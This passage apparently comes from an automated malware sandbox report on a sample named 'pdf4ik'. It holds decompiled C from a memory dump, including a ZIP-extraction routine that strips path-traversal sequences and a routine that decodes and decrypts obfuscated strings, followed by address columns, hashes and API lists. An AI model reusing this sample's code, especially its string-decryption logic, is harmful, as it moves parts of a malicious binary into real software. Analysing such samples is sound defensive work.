				signed int _t248;
				intOrPtr _t259;
				signed int _t262;
				signed int _t264;
				void* _t274;
				signed int _t282;
				signed int _t287;
				signed char _t296;
				signed int _t298;
				signed int _t304;
				intOrPtr* _t310;
				void* _t330;
				void* _t342;
				signed char _t349;
				signed int _t365;
				signed int _t370;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr* _t382;
				void* _t384;
				void* _t389;
				intOrPtr* _t393;
				signed int _t394;
				signed int _t397;
				void* _t398;
				void* _t399;
				void* _t401;
				void* _t402;

				_t341 = __edx;
				_t182 =  *0x29dd5664; // 0xd9555f04
				_v12 = _t182 ^ _t397;
				_t184 = _a4;
				_t273 = __ecx;
				_t393 = __edx;
				_v576 = __ecx;
				_v580 = __edx;
				if(_t184 < 0xffffffff) {
					L81:
					__eflags = _v12 ^ _t397;
					return E29DADF46(0x10000, _t273, _v12 ^ _t397, _t341, _t379, _t393);
				} else {
					_t379 =  *__ecx;
					if(_t184 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L81;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
							E29D8D630(__ecx, _t379);
							_t184 = _a4;
						}
						_t273[1] = 0xffffffff;
						if(_t184 != _t273[0x4d]) {
							__eflags = _t184 - 0xffffffff;
							if(_t184 != 0xffffffff) {
								_t394 =  *_t273;
								__eflags = _t184 -  *((intOrPtr*)(_t394 + 0x10));
								if(_t184 <  *((intOrPtr*)(_t394 + 0x10))) {
									E29D8CE10(_t394);
									_t184 = _a4;
								}
								_t342 =  *_t273;
								__eflags =  *((intOrPtr*)(_t342 + 0x10)) - _t184;
								if( *((intOrPtr*)(_t342 + 0x10)) < _t184) {
									do {
										_t394 =  *_t273;
										__eflags = _t394;
										if(_t394 != 0) {
											__eflags =  *(_t394 + 0x18);
											if( *(_t394 + 0x18) != 0) {
												_t259 =  *((intOrPtr*)(_t394 + 0x10)) + 1;
												__eflags = _t259 -  *((intOrPtr*)(_t394 + 4));
												if(_t259 !=  *((intOrPtr*)(_t394 + 4))) {
													 *((intOrPtr*)(_t394 + 0x14)) =  *((intOrPtr*)(_t394 + 0x14)) +  *((intOrPtr*)(_t394 + 0x50)) +  *((intOrPtr*)(_t394 + 0x4c)) +  *((intOrPtr*)(_t394 + 0x48)) + 0x2e;
													 *((intOrPtr*)(_t394 + 0x10)) = _t259;
													_t262 = E29D8CA10(_t394, _t394 + 0x28, _t394 + 0x78, 0, 0);
													_t398 = _t398 + 0x10;
													asm("sbb eax, eax");
													_t264 = 1 +  ~_t262;
													__eflags = _t264;
													 *(_t394 + 0x18) = _t264;
												}
											}
										}
										_t330 =  *_t273;
										__eflags =  *((intOrPtr*)(_t330 + 0x10)) - _a4;
									} while ( *((intOrPtr*)(_t330 + 0x10)) < _a4);
								}
								E29D8CA10( *_t273,  &_v688, 0,  &_v280, 0x104);
								_t380 =  *_t273;
								_t191 = E29D8CFB0( *_t273,  &(_v588.dwHighDateTime),  &_v568,  &_v572);
								_t399 = _t398 + 0x1c;
								__eflags = _t191;
								if(_t191 == 0) {
									_t344 =  *_t273;
									_t192 =  *( *_t273);
									__eflags =  *_t192;
									if(__eflags == 0) {
										 *((intOrPtr*)(_t192 + 0x1c)) = _v568;
										goto L23;
									} else {
										__eflags =  *((char*)(1 + _t192));
										if(__eflags == 0) {
											L25:
											__eflags = _v12 ^ _t397;
											return E29DADF46(0x800, _t273, _v12 ^ _t397, _t344, _t380, _t394);
										} else {
											_t344 =  *(_t192 + 4);
											SetFilePointer( *(_t192 + 4),  *((intOrPtr*)(_t192 + 0xc)) + _v568, 0, 0);
											L23:
											_t193 = E29DAD4FB(_t273, _t344, _v572, _t394, __eflags, _v572);
											_t344 =  *_t273;
											_t394 = _t193;
											_t380 =  *( *_t273);
											_t273 = 1;
											_t194 = E29D8C480(1, _t380, _t394, _v572);
											_t401 = _t399 + 0xc;
											__eflags = _t194 - _v572;
											if(_t194 == _v572) {
												_t274 = _v580;
												 *_t274 =  *( *_v576 + 0x10);
												_t196 = 0;
												__eflags = 0;
												do {
													_t282 =  *((intOrPtr*)(_t397 + _t196 - 0x114));
													 *((char*)(_t397 + _t196 - 0x21c)) = _t282;
													_t196 = _t196 + 1;
													__eflags = _t282;
												} while (_t282 != 0);
												_t382 =  &_v544;
												while(1) {
													_t197 =  *_t382;
													__eflags = _t197;
													if(_t197 == 0) {
														goto L32;
													}
													L30:
													__eflags =  *((char*)(_t382 + 1)) - 0x3a;
													if( *((char*)(_t382 + 1)) == 0x3a) {
														_t382 = _t382 + 2;
														while(1) {
															_t197 =  *_t382;
															__eflags = _t197;
															if(_t197 == 0) {
																goto L32;
															}
															goto L30;
														}
													}
													L32:
													__eflags = _t197 - 0x5c;
													if(_t197 == 0x5c) {
														_t382 = _t382 + 1;
														while(1) {
															_t197 =  *_t382;
															__eflags = _t197;
															if(_t197 == 0) {
																goto L32;
															}
															goto L30;
														}
													}
													__eflags = _t197 - 0x2f;
													if(_t197 == 0x2f) {
														_t382 = _t382 + 1;
														while(1) {
															_t197 =  *_t382;
															__eflags = _t197;
															if(_t197 == 0) {
																goto L32;
															}
															goto L30;
														}
													}
													_t198 = E29DAEA6C(_t382, "\\..\\");
													_t401 = _t401 + 8;
													__eflags = _t198;
													if(_t198 != 0) {
														_t69 = _t198 + 4; // 0x4
														_t382 = _t69;
														while(1) {
															_t197 =  *_t382;
															__eflags = _t197;
															if(_t197 == 0) {
																goto L32;
															}
															goto L30;
														}
													}
													_t199 = E29DAEA6C(_t382, "\\../");
													_t401 = _t401 + 8;
													__eflags = _t199;
													if(_t199 != 0) {
														_t70 = _t199 + 4; // 0x4
														_t382 = _t70;
														while(1) {
															_t197 =  *_t382;
															__eflags = _t197;
															if(_t197 == 0) {
																goto L32;
															}
															goto L30;
														}
													}
													_t200 = E29DAEA6C(_t382, "/../");
													_t401 = _t401 + 8;
													__eflags = _t200;
													if(_t200 != 0) {
														_t71 = _t200 + 4; // 0x4
														_t382 = _t71;
														while(1) {
															_t197 =  *_t382;
															__eflags = _t197;
															if(_t197 == 0) {
																goto L32;
															}
															goto L30;
														}
														goto L32;
													}
													_t201 = E29DAEA6C(_t382, "/..\\");
													_t401 = _t401 + 8;
													__eflags = _t201;
													if(_t201 != 0) {
														_t72 = _t201 + 4; // 0x4
														_t382 = _t72;
														continue;
													}
													E29DAE8E8(_t274 + 4, _t382, 0x104);
													_t204 = _v636;
													_v561 = _t204 >> 0x0000001e & 0x00000001;
													_t287 = _v688 >> 8;
													_t402 = _t401 + 0xc;
													_t349 =  !(_t204 >> 0x17) & 0x00000001;
													_v563 = 0;
													_v564 = 0;
													_v562 = 1;
													__eflags = _t287;
													if(_t287 == 0) {
														L48:
														_v563 = _t204 >> 0x00000001 & 0x00000001;
														_v564 = _t204 >> 0x00000002 & 0x00000001;
														_t349 = _t204 & 0x00000001;
														_t296 = _t204 >> 0x00000004 & 0x00000001;
														_t206 = _t204 >> 0x00000005 & 0x00000001;
													} else {
														__eflags = _t287 - 7;
														if(_t287 == 7) {
															goto L48;
														} else {
															__eflags = _t287 - 0xb;
															if(_t287 == 0xb) {
																goto L48;
															} else {
																__eflags = _t287 - 0xe;
																if(_t287 != 0xe) {
																	_t206 = _v562;
																	_t296 = _v561;
																} else {
																	goto L48;
																}
															}
														}
													}
													 *(_t274 + 0x108) = 0;
													__eflags = _t296;
													if(_t296 != 0) {
														 *(_t274 + 0x108) = 0x10;
													}
													__eflags = _t206;
													if(_t206 != 0) {
														_t86 = _t274 + 0x108;
														 *_t86 =  *(_t274 + 0x108) | 0x00000020;
														__eflags =  *_t86;
													}
													__eflags = _v563;
													if(_v563 != 0) {
														_t89 = _t274 + 0x108;
														 *_t89 =  *(_t274 + 0x108) | 0x00000002;
														__eflags =  *_t89;
													}
													__eflags = _t349;
													if(_t349 != 0) {
														_t91 = _t274 + 0x108;
														 *_t91 =  *(_t274 + 0x108) | 0x00000001;
														__eflags =  *_t91;
													}
													__eflags = _v564;
													if(_v564 != 0) {
														_t94 = _t274 + 0x108;
														 *_t94 =  *(_t274 + 0x108) | 0x00000004;
														__eflags =  *_t94;
													}
													 *((intOrPtr*)(_t274 + 0x124)) = _v664;
													 *((intOrPtr*)(_t274 + 0x128)) = _v660;
													_t208 = _v672;
													_t298 = _t208 >> 0x10;
													_v560.wYear = (_t298 >> 9) + 0x7bc;
													_v560.wMonth = _t298 >> 0x00000005 & 0x0000000f;
													_v560.wDay = _t298 & 0x0000001f;
													_v560.wHour = _t208 >> 0xb;
													_v560.wMinute = _t208 >> 0x00000005 & 0x0000003f;
													_v560.wSecond = (_t208 & 0x0000001f) + (_t208 & 0x0000001f);
													_v560.wMilliseconds = 0;
													SystemTimeToFileTime( &_v560,  &_v588);
													_v604.dwLowDateTime = _v588.dwLowDateTime;
													_v604.dwHighDateTime = _v588.dwHighDateTime;
													LocalFileTimeToFileTime( &_v604,  &_v596);
													_t216 = _v596.dwLowDateTime;
													_t304 = _v596.dwHighDateTime;
													_t384 = 0;
													__eflags = _v572 - 4;
													 *(_t274 + 0x10c) = _t216;
													 *(_t274 + 0x110) = _t304;
													 *(_t274 + 0x114) = _t216;
													 *(_t274 + 0x118) = _t304;
													 *(_t274 + 0x11c) = _t216;
													 *(_t274 + 0x120) = _t304;
													if(_v572 > 4) {
														_v566 = 0;
														do {
															_v568 =  *((intOrPtr*)(_t384 + _t394));
															_v567 =  *((intOrPtr*)(_t384 + 1 + _t394));
															_t310 = "UT";
															_t222 =  &_v568;
															while(1) {
																_t365 =  *_t222;
																__eflags = _t365 -  *_t310;
																if(_t365 !=  *_t310) {
																	break;
																}
																__eflags = _t365;
																if(_t365 == 0) {
																	L67:
																	_t222 = 0;
																} else {
																	_t375 =  *((intOrPtr*)(1 + _t222));
																	_t133 = _t310 + 1; // 0x25000054
																	__eflags = _t375 -  *_t133;
																	if(_t375 !=  *_t133) {
																		break;
																	} else {
																		_t222 = _t222 + 2;
																		_t310 = _t310 + 2;
																		__eflags = _t375;
																		if(_t375 != 0) {
																			continue;
																		} else {
																			goto L67;
																		}
																	}
																}
																L69:
																__eflags = _t222;
																if(_t222 == 0) {
																	_t223 =  *(_t384 + _t394 + 4) & 0x000000ff;
																	_t389 = _t384 + 5;
																	_v561 = _t223 >> 0x00000001 & 0x00000001;
																	_v562 = _t223 >> 0x00000002 & 0x00000001;
																	__eflags = _t223 & 0x00000001;
																	if((_t223 & 0x00000001) != 0) {
																		_t374 =  *(_t389 + _t394) & 0x000000ff;
																		_t248 = ((( *(_t389 + _t394 + 3) & 0x000000ff) << 0x00000008 |  *(_t389 + _t394 + 2) & 0x000000ff) << 0x00000008 |  *(_t389 + 1 + _t394) & 0x000000ff) << 0x00000008 | _t374;
																		asm("cdq");
																		_t389 = _t389 + 4;
																		__eflags = _t248 + 0xb6109100;
																		asm("adc edx, 0x2");
																		 *(_t274 + 0x11c) = E29DBC6C0(_t248 + 0xb6109100, _t374, 0x989680, 0);
																		 *(_t274 + 0x120) = _t374;
																	}
																	__eflags = _v561;
																	if(_v561 != 0) {
																		_t372 =  *(_t389 + _t394) & 0x000000ff;
																		_t239 = ((( *(_t389 + _t394 + 3) & 0x000000ff) << 0x00000008 |  *(_t389 + _t394 + 2) & 0x000000ff) << 0x00000008 |  *(_t389 + 1 + _t394) & 0x000000ff) << 0x00000008 | _t372;
																		asm("cdq");
																		_t389 = _t389 + 4;
																		__eflags = _t239 + 0xb6109100;
																		asm("adc edx, 0x2");
																		 *(_t274 + 0x10c) = E29DBC6C0(_t239 + 0xb6109100, _t372, 0x989680, 0);
																		 *(_t274 + 0x110) = _t372;
																	}
																	__eflags = _v562;
																	if(_v562 != 0) {
																		_t370 =  *(_t389 + _t394) & 0x000000ff;
																		asm("cdq");
																		__eflags = (((( *(_t389 + _t394 + 3) & 0x000000ff) << 0x00000008 |  *(_t389 + _t394 + 2) & 0x000000ff) << 0x00000008 |  *(_t389 + 1 + _t394) & 0x000000ff) << 0x00000008 | _t370) + 0xb6109100;
																		asm("adc edx, 0x2");
																		 *(_t274 + 0x114) = E29DBC6C0((((( *(_t389 + _t394 + 3) & 0x000000ff) << 0x00000008 |  *(_t389 + _t394 + 2) & 0x000000ff) << 0x00000008 |  *(_t389 + 1 + _t394) & 0x000000ff) << 0x00000008 | _t370) + 0xb6109100, _t370, 0x989680, 0);
																		 *(_t274 + 0x118) = _t370;
																	}
																} else {
																	goto L70;
																}
																goto L78;
															}
															asm("sbb eax, eax");
															asm("sbb eax, 0xffffffff");
															goto L69;
															L70:
															_t384 = _t384 + ( *(_t384 + _t394 + 2) & 0x000000ff) + 4;
															__eflags = _t384 + 4 - _v572;
														} while (_t384 + 4 < _v572);
													}
													L78:
													__eflags = _t394;
													if(_t394 != 0) {
														_push(_t394);
														E29DAEA83();
														_t402 = _t402 + 4;
													}
													 *((intOrPtr*)(memcpy(_v576 + 8, _t274, 0x4b << 2) + 0x134)) = _a4;
													__eflags = _v12 ^ _t397;
													return E29DADF46(0, _t274, _v12 ^ _t397, _a4, _t274 + 0x96, _t274);
													goto L82;
												}
											} else {
												_push(_t394);
												E29DAEA83();
												goto L25;
											}
										}
									}
								} else {
									__eflags = _v12 ^ _t397;
									return E29DADF46(0x700, _t273, _v12 ^ _t397,  &_v572, _t380, _t394);
								}
							} else {
								goto L8;
							}
						} else {
							if(_t184 == 0xffffffff) {
								L8:
								 *_t393 =  *((intOrPtr*)( *_t273 + 4));
								 *((char*)(_t393 + 4)) = 0;
								 *((intOrPtr*)(_t393 + 0x108)) = 0;
								 *((intOrPtr*)(_t393 + 0x10c)) = 0;
								 *((intOrPtr*)(_t393 + 0x110)) = 0;
								 *((intOrPtr*)(_t393 + 0x114)) = 0;
								 *((intOrPtr*)(_t393 + 0x118)) = 0;
								 *((intOrPtr*)(_t393 + 0x11c)) = 0;
								 *((intOrPtr*)(_t393 + 0x120)) = 0;
								 *((intOrPtr*)(_t393 + 0x124)) = 0;
								 *((intOrPtr*)(_t393 + 0x128)) = 0;
								__eflags = _v12 ^ _t397;
								return E29DADF46(0, _t273, _v12 ^ _t397, _t341, _t379, _t393);
							} else {
								memcpy(_v580,  &(_t273[2]), 0x4b << 2);
								return E29DADF46(0, _t273, _v12 ^ _t397, _t341,  &(_t273[0x27]),  &(_t273[2]));
							}
						}
					}
				}
				L82:
			}












































































                                        0x29d8d7b0
                                        0x29d8d7b9
                                        0x29d8d7c0
                                        0x29d8d7c3
                                        0x29d8d7c8
                                        0x29d8d7ca
                                        0x29d8d7cd
                                        0x29d8d7d3
                                        0x29d8d7dc
                                        0x29d8de32
                                        0x29d8de37
                                        0x29d8de47
                                        0x29d8d7e2
                                        0x29d8d7e2
                                        0x29d8d7e7
                                        0x00000000
                                        0x29d8d7ed
                                        0x29d8d7f1
                                        0x29d8d7f3
                                        0x29d8d7f8
                                        0x29d8d7f8
                                        0x29d8d7fb
                                        0x29d8d808
                                        0x29d8d834
                                        0x29d8d837
                                        0x29d8d88e
                                        0x29d8d890
                                        0x29d8d893
                                        0x29d8d895
                                        0x29d8d89a
                                        0x29d8d89a
                                        0x29d8d89d
                                        0x29d8d89f
                                        0x29d8d8a2
                                        0x29d8d8a4
                                        0x29d8d8a4
                                        0x29d8d8a6
                                        0x29d8d8a8
                                        0x29d8d8aa
                                        0x29d8d8ae
                                        0x29d8d8b3
                                        0x29d8d8b4
                                        0x29d8d8b7
                                        0x29d8d8c8
                                        0x29d8d8cb
                                        0x29d8d8da
                                        0x29d8d8df
                                        0x29d8d8e4
                                        0x29d8d8e6
                                        0x29d8d8e6
                                        0x29d8d8e7
                                        0x29d8d8e7
                                        0x29d8d8b7
                                        0x29d8d8ae
                                        0x29d8d8ea
                                        0x29d8d8ef
                                        0x29d8d8ef
                                        0x29d8d8a4
                                        0x29d8d90b
                                        0x29d8d910
                                        0x29d8d927
                                        0x29d8d92c
                                        0x29d8d92f
                                        0x29d8d931
                                        0x29d8d94b
                                        0x29d8d94d
                                        0x29d8d94f
                                        0x29d8d952
                                        0x29d8d97a
                                        0x00000000
                                        0x29d8d954
                                        0x29d8d954
                                        0x29d8d958
                                        0x29d8d9b2
                                        0x29d8d9bd
                                        0x29d8d9c7
                                        0x29d8d95a
                                        0x29d8d963
                                        0x29d8d96c
                                        0x29d8d97d
                                        0x29d8d984
                                        0x29d8d989
                                        0x29d8d98e
                                        0x29d8d991
                                        0x29d8d994
                                        0x29d8d999
                                        0x29d8d99e
                                        0x29d8d9a1
                                        0x29d8d9a7
                                        0x29d8d9d5
                                        0x29d8d9db
                                        0x29d8d9dd
                                        0x29d8d9dd
                                        0x29d8d9e0
                                        0x29d8d9e0
                                        0x29d8d9e7
                                        0x29d8d9ee
                                        0x29d8d9ef
                                        0x29d8d9ef
                                        0x29d8d9f3
                                        0x29d8da00
                                        0x29d8da00
                                        0x29d8da02
                                        0x29d8da04
                                        0x00000000
                                        0x00000000
                                        0x29d8da06
                                        0x29d8da06
                                        0x29d8da0a
                                        0x29d8da0c
                                        0x29d8da00
                                        0x29d8da00
                                        0x29d8da02
                                        0x29d8da04
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8da04
                                        0x29d8da00
                                        0x29d8da11
                                        0x29d8da11
                                        0x29d8da13
                                        0x29d8da15
                                        0x29d8da00
                                        0x29d8da00
                                        0x29d8da02
                                        0x29d8da04
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8da04
                                        0x29d8da00
                                        0x29d8da18
                                        0x29d8da1a
                                        0x29d8da1c
                                        0x29d8da00
                                        0x29d8da00
                                        0x29d8da02
                                        0x29d8da04
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8da04
                                        0x29d8da00
                                        0x29d8da25
                                        0x29d8da2a
                                        0x29d8da2d
                                        0x29d8da2f
                                        0x29d8da31
                                        0x29d8da31
                                        0x29d8da00
                                        0x29d8da00
                                        0x29d8da02
                                        0x29d8da04
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8da04
                                        0x29d8da00
                                        0x29d8da3c
                                        0x29d8da41
                                        0x29d8da44
                                        0x29d8da46
                                        0x29d8da48
                                        0x29d8da48
                                        0x29d8da00
                                        0x29d8da00
                                        0x29d8da02
                                        0x29d8da04
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8da04
                                        0x29d8da00
                                        0x29d8da53
                                        0x29d8da58
                                        0x29d8da5b
                                        0x29d8da5d
                                        0x29d8da5f
                                        0x29d8da5f
                                        0x29d8da00
                                        0x29d8da00
                                        0x29d8da02
                                        0x29d8da04
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8da04
                                        0x00000000
                                        0x29d8da00
                                        0x29d8da6a
                                        0x29d8da6f
                                        0x29d8da72
                                        0x29d8da74
                                        0x29d8da76
                                        0x29d8da76
                                        0x00000000
                                        0x29d8da76
                                        0x29d8da85
                                        0x29d8da8a
                                        0x29d8da9d
                                        0x29d8daab
                                        0x29d8daae
                                        0x29d8dab1
                                        0x29d8dab4
                                        0x29d8dabb
                                        0x29d8dac2
                                        0x29d8dac9
                                        0x29d8dacb
                                        0x29d8dadc
                                        0x29d8dae3
                                        0x29d8daf1
                                        0x29d8db01
                                        0x29d8db04
                                        0x29d8db07
                                        0x29d8dacd
                                        0x29d8dacd
                                        0x29d8dad0
                                        0x00000000
                                        0x29d8dad2
                                        0x29d8dad2
                                        0x29d8dad5
                                        0x00000000
                                        0x29d8dad7
                                        0x29d8dad7
                                        0x29d8dada
                                        0x29d8db0b
                                        0x29d8db11
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8dada
                                        0x29d8dad5
                                        0x29d8dad0
                                        0x29d8db17
                                        0x29d8db21
                                        0x29d8db23
                                        0x29d8db25
                                        0x29d8db25
                                        0x29d8db2f
                                        0x29d8db31
                                        0x29d8db33
                                        0x29d8db33
                                        0x29d8db33
                                        0x29d8db33
                                        0x29d8db3a
                                        0x29d8db41
                                        0x29d8db43
                                        0x29d8db43
                                        0x29d8db43
                                        0x29d8db43
                                        0x29d8db4a
                                        0x29d8db4c
                                        0x29d8db4e
                                        0x29d8db4e
                                        0x29d8db4e
                                        0x29d8db4e
                                        0x29d8db55
                                        0x29d8db5c
                                        0x29d8db5e
                                        0x29d8db5e
                                        0x29d8db5e
                                        0x29d8db5e
                                        0x29d8db71
                                        0x29d8db77
                                        0x29d8db7d
                                        0x29d8db85
                                        0x29d8db97
                                        0x29d8dba9
                                        0x29d8dbb0
                                        0x29d8dbc9
                                        0x29d8dbd8
                                        0x29d8dbdf
                                        0x29d8dbf0
                                        0x29d8dbf7
                                        0x29d8dc0f
                                        0x29d8dc1d
                                        0x29d8dc23
                                        0x29d8dc29
                                        0x29d8dc2f
                                        0x29d8dc35
                                        0x29d8dc37
                                        0x29d8dc3e
                                        0x29d8dc44
                                        0x29d8dc4a
                                        0x29d8dc50
                                        0x29d8dc56
                                        0x29d8dc5c
                                        0x29d8dc62
                                        0x29d8dc68
                                        0x29d8dc70
                                        0x29d8dc77
                                        0x29d8dc7d
                                        0x29d8dc83
                                        0x29d8dc88
                                        0x29d8dc90
                                        0x29d8dc90
                                        0x29d8dc92
                                        0x29d8dc94
                                        0x00000000
                                        0x00000000
                                        0x29d8dc96
                                        0x29d8dc98
                                        0x29d8dcac
                                        0x29d8dcac
                                        0x29d8dc9a
                                        0x29d8dc9a
                                        0x29d8dc9d
                                        0x29d8dc9d
                                        0x29d8dca0
                                        0x00000000
                                        0x29d8dca2
                                        0x29d8dca2
                                        0x29d8dca5
                                        0x29d8dca8
                                        0x29d8dcaa
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8dcaa
                                        0x29d8dca0
                                        0x29d8dcb5
                                        0x29d8dcb5
                                        0x29d8dcb7
                                        0x29d8dcd2
                                        0x29d8dce6
                                        0x29d8dce9
                                        0x29d8dcef
                                        0x29d8dcf5
                                        0x29d8dcf7
                                        0x29d8dd0d
                                        0x29d8dd19
                                        0x29d8dd1b
                                        0x29d8dd1e
                                        0x29d8dd21
                                        0x29d8dd2b
                                        0x29d8dd3a
                                        0x29d8dd40
                                        0x29d8dd40
                                        0x29d8dd46
                                        0x29d8dd4d
                                        0x29d8dd63
                                        0x29d8dd6f
                                        0x29d8dd71
                                        0x29d8dd74
                                        0x29d8dd77
                                        0x29d8dd81
                                        0x29d8dd90
                                        0x29d8dd96
                                        0x29d8dd96
                                        0x29d8dd9c
                                        0x29d8dda3
                                        0x29d8ddb9
                                        0x29d8ddc7
                                        0x29d8ddca
                                        0x29d8ddd4
                                        0x29d8dde3
                                        0x29d8dde9
                                        0x29d8dde9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8dcb7
                                        0x29d8dcb0
                                        0x29d8dcb2
                                        0x00000000
                                        0x29d8dcb9
                                        0x29d8dcbe
                                        0x29d8dcc5
                                        0x29d8dcc5
                                        0x29d8dccd
                                        0x29d8ddef
                                        0x29d8ddef
                                        0x29d8ddf1
                                        0x29d8ddf3
                                        0x29d8ddf4
                                        0x29d8ddf9
                                        0x29d8ddf9
                                        0x29d8de17
                                        0x29d8de25
                                        0x29d8de2f
                                        0x00000000
                                        0x29d8de2f
                                        0x29d8d9a9
                                        0x29d8d9a9
                                        0x29d8d9aa
                                        0x00000000
                                        0x29d8d9af
                                        0x29d8d9a7
                                        0x29d8d958
                                        0x29d8d933
                                        0x29d8d93e
                                        0x29d8d948
                                        0x29d8d948
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d8d80a
                                        0x29d8d80d
                                        0x29d8d839
                                        0x29d8d840
                                        0x29d8d842
                                        0x29d8d845
                                        0x29d8d84b
                                        0x29d8d851
                                        0x29d8d857
                                        0x29d8d85d
                                        0x29d8d863
                                        0x29d8d869
                                        0x29d8d86f
                                        0x29d8d875
                                        0x29d8d881
                                        0x29d8d88b
                                        0x29d8d80f
                                        0x29d8d81d
                                        0x29d8d831
                                        0x29d8d831
                                        0x29d8d80d
                                        0x29d8d808
                                        0x29d8d7e7
                                        0x00000000

                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: /../$/..\$\../$\..\
                                        • API String ID: 0-3885502717
                                        • Opcode ID: 502b6626edd748fd79d1806f33c56f0d675780aa630f3d8e093e2712fc96fa36
                                        • Instruction ID: 8d56c0f29fa1f9e6326d2610230fae3cc97c25bb970a6d527841d52e6206e6b4
                                        • Opcode Fuzzy Hash: 502b6626edd748fd79d1806f33c56f0d675780aa630f3d8e093e2712fc96fa36
                                        • Instruction Fuzzy Hash: 04123A719002549FCB18CF28C884BE9B7F5FF99300F1485EDD94A9B682D735AA87DB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D98FB0 Relevance: 9.1, APIs: 6, Instructions: 112stringencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 45%
                                        			E29D98FB0(CHAR* __ecx) {
				signed int _v8;
				char _v8104;
				int _v8108;
				CHAR* _v8112;
				CHAR* _v8116;
				char _v8120;
				int _v8124;
				BYTE* _v8128;
				char _v8132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				void* _t35;
				void* _t42;
				void* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				CHAR* _t65;
				intOrPtr _t66;
				signed int _t67;
				void* _t68;
				void* _t69;
				void* _t70;

				E29DBCDB0(0x1fc0);
				_t25 =  *0x29dd5664; // 0xd9555f04
				_v8 = _t25 ^ _t67;
				_t65 = __ecx;
				_v8108 = 0x1fa0;
				E29DB5640( &_v8104, 0, 0x1fa0);
				_t69 = _t68 + 0xc;
				_t61 =  &_v8104;
				if(CryptStringToBinaryA(_t65, lstrlenA(_t65), 1,  &_v8104,  &_v8108, 0, 0) == 0) {
					L7:
					return E29DADF46(0x29dcd617, _t47, _v8 ^ _t67, _t61, 0x29dcd617, _t65);
				} else {
					_t48 =  *0x29dd82fc(_t47);
					_t65 = 0;
					if(_t48 == 0) {
						lstrcatA(0x29dcd617, 0x29dcd617);
						_pop(_t47);
						goto L7;
					} else {
						_t35 =  *0x29dd8340(_t48, 1, 0);
						_t70 = _t69 + 0xc;
						if(_t35 != 0) {
							L5:
							lstrcatA(0x29dcd617, 0x29dcd617);
							 *0x29dd8324();
							_t49 = _t48;
							return E29DADF46(0x29dcd617, _t49, _v8 ^ _t67, _t61, 0x29dcd617, _t65);
						} else {
							_t61 =  &_v8120;
							_v8128 =  &_v8104;
							_v8124 = _v8108;
							_v8116 = 0;
							_v8112 = 0;
							_t42 =  *0x29dd831c( &_v8132,  &_v8120, 0);
							_t70 = _t70 + 0xc;
							if(_t42 != 0) {
								goto L5;
							} else {
								_t66 = _v8112;
								E29DB0010( &_v8104, _v8116, _t66);
								 *((char*)(_t67 + _t66 - 0x1fa4)) = 0;
								 *0x29dd8324();
								_t50 = _t48;
								return E29DADF46( &_v8104, _t50, _v8 ^ _t67,  &_v8104,  &_v8104, _t66);
							}
						}
					}
				}
			}




























                                        0x29d98fb8
                                        0x29d98fbd
                                        0x29d98fc4
                                        0x29d98fd7
                                        0x29d98fd9
                                        0x29d98fe8
                                        0x29d98fed
                                        0x29d98ffb
                                        0x29d99015
                                        0x29d99109
                                        0x29d9911a
                                        0x29d9901b
                                        0x29d99022
                                        0x29d99024
                                        0x29d99028
                                        0x29d99102
                                        0x29d99108
                                        0x00000000
                                        0x29d9902e
                                        0x29d99032
                                        0x29d99038
                                        0x29d9903d
                                        0x29d990cb
                                        0x29d990d5
                                        0x29d990dc
                                        0x29d990e5
                                        0x29d990f7
                                        0x29d99043
                                        0x29d99050
                                        0x29d99056
                                        0x29d99064
                                        0x29d9906a
                                        0x29d99070
                                        0x29d99076
                                        0x29d9907c
                                        0x29d99081
                                        0x00000000
                                        0x29d99083
                                        0x29d99083
                                        0x29d99098
                                        0x29d990a1
                                        0x29d990af
                                        0x29d990b8
                                        0x29d990ca
                                        0x29d990ca
                                        0x29d99081
                                        0x29d9903d
                                        0x29d99028

                                        APIs
                                        • _memset.LIBCMT ref: 29D98FE8
                                        • lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,29D9ABE7,?,?,?,29DCD617,?), ref: 29D99005
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 29D9900D
                                        • _memmove.LIBCMT ref: 29D99098
                                        • lstrcatA.KERNEL32(29DCD617,29DCD617,?,00000000,00000000,?,?,29D9ABE7,?,?,?,29DCD617,?), ref: 29D990D5
                                        • lstrcatA.KERNEL32(29DCD617,29DCD617,?,00000000,?,00000001,?,?,00000000,00000000,?,?,29D9ABE7), ref: 29D99102
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptString_memmove_memsetlstrlen
                                        • String ID:
                                        • API String ID: 943939369-0
                                        • Opcode ID: f6e4f95a7e1f13faa30a4ffc92f88969ca9cdba25140e2fd23661525565cc47f
                                        • Instruction ID: a0ac1a8cf55649aba4953bbb728eac2bd14c2a03c32db4707c3ffb754903344d
                                        • Opcode Fuzzy Hash: f6e4f95a7e1f13faa30a4ffc92f88969ca9cdba25140e2fd23661525565cc47f
